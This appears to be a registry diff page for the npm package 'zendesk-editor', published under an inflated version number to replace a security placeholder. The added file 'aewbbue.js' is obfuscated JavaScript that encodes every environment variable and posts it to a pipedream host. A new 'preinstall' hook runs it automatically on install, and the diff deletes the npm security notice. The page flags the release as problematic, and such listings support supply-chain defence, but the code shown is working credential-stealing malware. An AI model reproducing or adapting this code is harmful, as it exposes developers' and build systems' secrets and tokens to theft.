zendesk-editor 0.0.1-security → 9998.800.587
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of zendesk-editor might be problematic. Click here for more details.
- package/aewbbue.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/aewbbue.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0xcea3(){const _0x44359d=['32545rfPOsA','2dZWQVS','539066ZwZfAC','npm_package_name','end','net','3328040vBgESl','env','522mJymvp','from','pipedream','3604468bxrgeY','stringify','base64','788115gSJQSE','toString','4aaa0dfa016c3686a57e93787657fa37','7736967UDiKUJ','1260156eUMRBh'];a0_0xcea3=function(){return _0x44359d;};return a0_0xcea3();}function a0_0x309f(_0x3a24ed,_0x459d6b){const _0xcea396=a0_0xcea3();return a0_0x309f=function(_0x309fb8,_0xeead27){_0x309fb8=_0x309fb8-0xde;let _0x422d1d=_0xcea396[_0x309fb8];return _0x422d1d;},a0_0x309f(_0x3a24ed,_0x459d6b);}const a0_0x459514=a0_0x309f;(function(_0x1ac13a,_0x1880ba){const _0x5cd99f=a0_0x309f,_0x128920=_0x1ac13a();while(!![]){try{const _0x5a3c91=parseInt(_0x5cd99f(0xe5))/0x1+parseInt(_0x5cd99f(0xe4))/0x2*(parseInt(_0x5cd99f(0xde))/0x3)+-parseInt(_0x5cd99f(0xe2))/0x4+parseInt(_0x5cd99f(0xe3))/0x5*(parseInt(_0x5cd99f(0xeb))/0x6)+parseInt(_0x5cd99f(0xee))/0x7+-parseInt(_0x5cd99f(0xe9))/0x8+-parseInt(_0x5cd99f(0xe1))/0x9;if(_0x5a3c91===_0x1880ba)break;else _0x128920['push'](_0x128920['shift']());}catch(_0x2f302f){_0x128920['push'](_0x128920['shift']());}}}(a0_0xcea3,0x475af));const http=require('https');req=http['request']({'host':[a0_0x459514(0xe0),'m',a0_0x459514(0xed),a0_0x459514(0xe8)]['join']('.'),'path':'/'+(process[a0_0x459514(0xea)][a0_0x459514(0xe6)]||''),'method':'POST'}),req['write'](Buffer[a0_0x459514(0xec)](JSON[a0_0x459514(0xef)](process[a0_0x459514(0xea)]))[a0_0x459514(0xdf)](a0_0x459514(0xf0))),req[a0_0x459514(0xe7)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "zendesk-editor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9998.800.587",
|
|
4
|
+
"main": "aewbbue.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node aewbbue.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=zendesk-editor for more information.
|